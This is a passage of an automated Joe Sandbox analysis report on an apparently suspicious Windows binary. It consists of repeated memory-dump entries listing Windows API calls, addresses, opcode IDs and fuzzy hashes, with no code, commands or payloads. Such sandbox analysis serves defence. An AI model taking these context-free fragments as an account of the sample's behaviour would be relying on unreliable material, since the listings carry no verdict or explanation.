                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow$InvalidateRect
                        • String ID:
                        • API String ID: 1976402638-0
                        • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                        • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                        • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                        • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                        APIs
                        • GetForegroundWindow.USER32 ref: 00442597
                          • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                        • GetDesktopWindow.USER32 ref: 004425BF
                        • GetWindowRect.USER32(00000000), ref: 004425C6
                        • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                        • GetCursorPos.USER32(?), ref: 00442624
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                        • String ID:
                        • API String ID: 4137160315-0
                        • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                        • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                        • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                        • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                        APIs
                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                        • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                        • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                        • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                        • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Enable$Show$MessageSend
                        • String ID:
                        • API String ID: 1871949834-0
                        • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                        • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                        • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                        • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                        APIs
                        • _memset.LIBCMT ref: 0044961A
                        • SendMessageW.USER32 ref: 0044964A
                          • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                        • _wcslen.LIBCMT ref: 004496BA
                        • _wcslen.LIBCMT ref: 004496C7
                        • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen$_memset_wcspbrk
                        • String ID:
                        • API String ID: 1624073603-0
                        • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                        • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                        • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                        • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                        • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                        • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                        • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DestroyWindow$DeleteObject$IconMove
                        • String ID:
                        • API String ID: 1640429340-0
                        • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                        • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                        • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                        • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __fileno__setmode$DebugOutputString_fprintf
                        • String ID:
                        • API String ID: 3354276064-0
                        • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                        • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                        • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                        • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Destroy$DeleteMenuObject$IconWindow
                        • String ID:
                        • API String ID: 752480666-0
                        • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                        • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                        • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                        • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                        • String ID:
                        • API String ID: 3275902921-0
                        • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                        • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                        • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                        • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                        • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                        • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                        • CloseHandle.KERNEL32(?), ref: 00439383
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                        • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                        • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                        • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                        • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                        APIs
                        • ___set_flsgetvalue.LIBCMT ref: 0041418F
                        • __calloc_crt.LIBCMT ref: 0041419B
                        • __getptd.LIBCMT ref: 004141A8
                        • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                        • __dosmaperr.LIBCMT ref: 00414201
                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                        • String ID:
                        • API String ID: 1803633139-0
                        • Opcode ID: e16809dd055500cc9d55e52b2a8bb0d222df9b3cc731a1ba011baabe8b5c6d4f
                        • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                        • Opcode Fuzzy Hash: e16809dd055500cc9d55e52b2a8bb0d222df9b3cc731a1ba011baabe8b5c6d4f
                        • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                        • String ID:
                        • API String ID: 3275902921-0
                        • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                        • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                        • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                        • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                        APIs
                        • SendMessageW.USER32 ref: 004554DF
                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                        • DeleteObject.GDI32(?), ref: 0045564E
                        • DeleteObject.GDI32(?), ref: 0045565C
                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                        • DestroyWindow.USER32 ref: 00455678
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                        • String ID:
                        • API String ID: 3691411573-0
                        • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                        • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                        • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                        • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcslen$_wcstok$ExtentPoint32Text
                        • String ID:
                        • API String ID: 1814673581-0
                        • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                        • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                        • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                        • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                        APIs
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                        • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                        • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                        • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                        APIs
                          • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                          • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                          • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                          • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                        • LineTo.GDI32(?,?,?), ref: 00447227
                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                        • LineTo.GDI32(?,?,?), ref: 0044723D
                        • EndPath.GDI32(?), ref: 0044724E
                        • StrokePath.GDI32(?), ref: 0044725C
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                        • String ID:
                        • API String ID: 372113273-0
                        • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                        • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                        • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                        • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                        • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                        • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                        • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                        APIs
                        • GetDC.USER32(00000000), ref: 0044CBEF
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                        • MulDiv.KERNEL32 ref: 0044CC29
                        • MulDiv.KERNEL32 ref: 0044CC37
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                        • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                        • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                        • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                        APIs
                        • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                        • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
